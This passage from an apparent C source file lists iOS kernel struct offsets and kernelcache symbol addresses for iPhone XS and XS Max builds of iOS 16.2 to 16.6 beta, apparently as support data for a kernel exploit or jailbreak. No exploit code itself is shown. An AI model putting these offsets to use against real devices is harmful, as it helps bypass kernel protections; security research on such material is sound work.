0xfffffff00a346990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a346988, .kernelcache__vn_kqfilter = 0xfffffff007ee863c, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPhone11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a309208, .kernelcache__gPhysBase = 0xfffffff0078f7fa0, .kernelcache__gPhysSize = 0xfffffff0078f7fa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078f6178, .kernelcache__perfmon_devices = 0xfffffff00a347500, .kernelcache__perfmon_dev_open = 0xfffffff007e99a88, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a346990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a346988, .kernelcache__vn_kqfilter = 0xfffffff007ee863c, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPhone11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a311288, .kernelcache__gPhysBase = 0xfffffff0078fc0e0, .kernelcache__gPhysSize = 0xfffffff0078fc0e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078fa2b8, .kernelcache__perfmon_devices = 0xfffffff00a34f500, .kernelcache__perfmon_dev_open = 0xfffffff007e9dc8c, .kernelcache__ptov_table = 0xfffffff0078af160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a34e990, .kernelcache__vm_pages = 0xfffffff0078abea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ae110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a34e988, .kernelcache__vn_kqfilter = 0xfffffff007eecad8, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPhone11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3e5ab0, .kernelcache__gPhysBase = 0xfffffff007914288, .kernelcache__gPhysSize = 0xfffffff007914288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007912440, .kernelcache__perfmon_devices = 0xfffffff00a425530, .kernelcache__perfmon_dev_open = 0xfffffff007ec2434, .kernelcache__ptov_table = 0xfffffff0078c79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a424910, .kernelcache__vm_pages = 0xfffffff0078c40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078c6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a424908, .kernelcache__vn_kqfilter = 0xfffffff007f10c44, }, // End iPhone XS // // Start iPhone Xs Max Global // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPhone11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a235178, .kernelcache__gPhysBase = 0xfffffff00781fc60, .kernelcache__gPhysSize = 0xfffffff00781fc60 + 0x8, .kernelcache__gVirtBase = 0xfffffff00781de40, .kernelcache__perfmon_devices = 0xfffffff00a270380, .kernelcache__perfmon_dev_open = 0xfffffff007e773ac, .kernelcache__ptov_table = 0xfffffff0077d3248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a26f800, .kernelcache__vm_pages = 0xfffffff0077d0080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077d2208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a26f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ec9a44, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPhone11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a239178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a274380, .kernelcache__perfmon_dev_open = 0xfffffff007e77398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a273800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2737f8, .kernelcache__vn_kqfilter = 0xfffffff007ec9a20, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPhone11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a239178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a274380, .kernelcache__perfmon_dev_open = 0xfffffff007e77398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a273800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2737f8, .kernelcache__vn_kqfilter = 0xfffffff007ec9a20, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E247", .device_id = "iPhone11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a309208, .kernelcache__gPhysBase = 0xfffffff0078f7fa0, .kernelcache__gPhysSize = 0xfffffff0078f7fa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078f6178, .kernelcache__perfmon_devices = 0xfffffff00a347500, .kernelcache__perfmon_dev_open = 0xfffffff007e99a88, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a346990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a346988, .kernelcache__vn_kqfilter = 0xfffffff007ee863c, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPhone11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a309208, .kernelcache__gPhysBase = 0xfffffff0078f7fa0, .kernelcache__gPhysSize = 0xfffffff0078f7fa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078f6178, .kernelcache__perfmon_devices = 0xfffffff00a347500, .kernelcache__perfmon_dev_open = 0xfffffff007e99a88, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a346990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a346988, .kernelcache__vn_kqfilter = 0xfffffff007ee863c, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPhone11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 